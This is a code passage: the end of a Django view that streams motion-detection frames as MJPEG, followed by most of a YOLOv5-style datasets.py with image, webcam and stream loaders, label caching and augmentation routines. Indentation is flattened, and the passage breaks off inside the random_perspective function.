# check to see if motion was found in the frame
if motion is not None:
# unpack the tuple and draw the box surrounding the "motion area" on the output frame
(thresh, (minX, minY, maxX, maxY)) = motion
cv2.rectangle(frame, (minX, minY), (maxX, maxY),
(0, 0, 255), 2)
# update the background model and increment the total number of frames read thus far
md.update(gray)
total += 1
# acquire the lock, set the output frame, and release the lock
with lock:
outputFrame = frame.copy()
def generate():
# grab global references to the output frame and lock variables
global outputFrame, lock
# loop over frames from the output stream
while True:
# wait until the lock is acquired
with lock:
# check if the output frame is available, otherwise skip
# the iteration of the loop
if outputFrame is None:
continue
# encode the frame in JPEG format
(flag, encodedImage) = cv2.imencode(".jpg", outputFrame)
# ensure the frame was successfully encoded
if not flag:
continue
# yield the output frame in the byte format
yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + bytearray(encodedImage) + b'\r\n')
def video_feed(request):
# return the response generated along with the specific media
# type (mime type)
return StreamingHttpResponse(generate(), content_type='multipart/x-mixed-replace; boundary=frame')
t = threading.Thread(target=detect_motion, kwargs={'frameCount': 32})
t.daemon = True
t.start()
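# For illustration only (not part of this file): the two views above are
# assumed to be wired up in the app's urls.py roughly like this:
#
# from django.urls import path
# from . import views
#
# urlpatterns = [
#     path('', views.index, name='index'),
#     path('video_feed/', views.video_feed, name='video_feed'),
# ]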
|
datasets.py
|
# Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.general import xyxy2xywh, xywh2xyxy, xywhn2xyxy, clean_str
from utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
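# Illustrative sketch (not part of the upstream file): a minimal call, assuming
# `opt` only needs a .single_cls attribute here; the dataset path is a placeholder.
#
# from types import SimpleNamespace
# dataloader, dataset = create_dataloader('../coco128/images/train2017', 640, 16, 32,
#                                         SimpleNamespace(single_cls=False))
# for imgs, targets, paths, shapes in dataloader:
#     pass  # imgs: uint8 BCHW tensor; targets: (n, 6) rows of [image_idx, class, x, y, w, h]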
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640):
self.img_size = img_size
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'stream'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print(f'{i + 1}/{n}: {s}... ', end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f' success ({w}x{h} at {fps:.2f} FPS).')
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [x.replace(sa, sb, 1).replace('.' + x.split('.')[-1], '.txt') for x in img_paths]
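# Illustrative example of the mapping above (paths are placeholders):
# 'dataset/images/train/0001.jpg' -> 'dataset/labels/train/0001.txt'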
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = Path(self.label_files[0]).parent.with_suffix('.cache') # cached labels
if cache_path.is_file():
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'results' not in cache: # changed
cache = self.cache_labels(cache_path, prefix) # re-cache
else:
cache = self.cache_labels(cache_path, prefix) # cache
# Display cache
[nf, nm, ne, nc, n] = cache.pop('results') # found, missing, empty, corrupted, total
desc = f"Scanning '{cache_path}' for images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + desc, total=n, initial=n)
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
labels, shapes = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, corrupted
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' for images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = [nf, nm, ne, nc, i + 1]
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels = self.labels[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9 = []
s = self.img_size
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(8)] # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels = self.labels[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
labels9.append(labels)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for x in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
if len(labels9):
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
np.clip(labels9[:, 1:], 0, 2 * s, out=labels9[:, 1:]) # use with random_perspective
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
